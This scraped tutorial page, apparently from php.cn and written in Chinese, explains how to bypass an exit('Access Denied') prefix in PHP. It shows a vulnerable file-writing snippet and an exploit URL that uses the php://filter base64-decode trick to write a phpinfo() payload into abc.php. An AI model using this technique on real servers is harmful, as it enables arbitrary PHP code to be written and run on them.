Community Learn Tools Library Leisure

English

Home > Database > Mysql Tutorial > body text

绕过'Access Denied'的方法

WBOY

Release： 2016-06-07 15:05:36

Original

2513 people have browsed it

经常会碰到'Access Denied'，如何绕过呢？请详细阅读本文作者带来的小技巧。 register_globals = On ? php $sqlcontent = ?PHPexit('AccessDenied');? . $p . \n ; file_put_contents ( $logfile , $sqlcontent ); ? exp-demo.php?logfile=php://filter/writ

经常会碰到'Access Denied'，如何绕过呢？请详细阅读本文作者带来的小技巧。

register_globals = On

<ol class="dp-c">
<li class="alt"><span><span><font color="#fe6600">php</font>  </span></span></li>
<li>
<span class="vars"><font color="#008284">$sqlcontent</font></span><span> = </span><span class="string"><font color="#006699">"<?PHP  exit('Access Denied'); ?>"</font></span><span>.</span><span class="vars"><font color="#008284">$p</font></span><span>.</span><span class="string"><font color="#006699">"\n"</font></span><span>;  </span>
</li>
<li class="alt">
<span class="func">file_put_contents</span><span>(</span><span class="vars"><font color="#008284">$logfile</font></span><span>, </span><span class="vars"><font color="#008284">$sqlcontent</font></span><span>);  </span>
</li>
<li><span>?> </span></li>
</ol>

Copy after login

exp-demo.php?logfile=php://filter/write=convert.base64-decode/resource=abc.php&p=aPD9waHAgcGhwaW5mbygpOy8vPz4=

base64-decode会掉过不能解码的特殊字符，变成PHPexitAccessDenied，Base64编码要求把3个8位字节（3*8=24）转化为4个6位的字节（4*6=24），保证能顺利解码补齐字符随便加个a补齐20位。（利用 base64 发生乱码）

参考
http://marc.info/?l=full-disclosure&m=126034719521671&w=2
http://docs.php.net/manual/zh/filters.convert.php

Related labels：

access denied method

source：php.cn

Previous article：成功人士谈思科认证考试技巧4 Next article：数据库原理

Statement of this Website

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

Latest Articles by Author

What is a NullPointerException, and how do I fix it?

2024-10-22 09:46:29
From Novice to Coder: Your Journey Begins with C Fundamentals

2024-10-13 13:53:41
Unlocking Web Development with PHP: A Beginner's Guide

2024-10-12 12:15:51
Demystifying C: A Clear and Simple Path for New Programmers

2024-10-11 22:47:31
Unlock Your Coding Potential: C Programming for Absolute Beginners

2024-10-11 19:36:51
Unleash Your Inner Programmer: C for Absolute Beginners

2024-10-11 15:50:41
Automate Your Life with C: Scripts and Tools for Beginners

2024-10-11 15:07:41
PHP Made Easy: Your First Steps in Web Development

2024-10-11 14:21:21
Build Anything with Python: A Beginner's Guide to Unleashing Your Creativity

2024-10-11 12:59:11
The Key to Coding: Unlocking the Power of Python for Beginners

2024-10-11 12:17:31

Latest Issues

Move the content to the left by adding the Width property I have provided margins to the body. main {left margin: 200px; right margin: 200px; text a...

From 2024-04-06 22:01:35

0

3

816

The page suddenly cannot pull css or bootstrap So I'm developing a page, I did part of it yesterday and it worked great, and today I cont...

From 2024-04-06 21:58:04

0

1

800

How to trigger render (with filter and pagination) on sort method in React? Here is my Sort.js style component: <SortWrapper><SortText>SortBy</SortText...

From 2024-04-06 21:28:37

0

1

2257

Creating this specific design using a grid: a step-by-step guide I'm trying to create a layout similar to this image, I've tried using this grid but can't ...

From 2024-04-06 20:29:08

0

2

492

How to use laravel components with livewire lazy placeholder I want to add the skeleton of my laravel component inside a livewire3 placeholder What I h...

From 2024-04-06 20:02:10

0

2

543

Related Topics

More>

Popular Recommendations

Popular Tutorials

More>

Related Tutorials

Popular Recommendations

Latest courses

Latest Downloads

More>

Web Effects

Website Source Code

Website Materials

Front End Template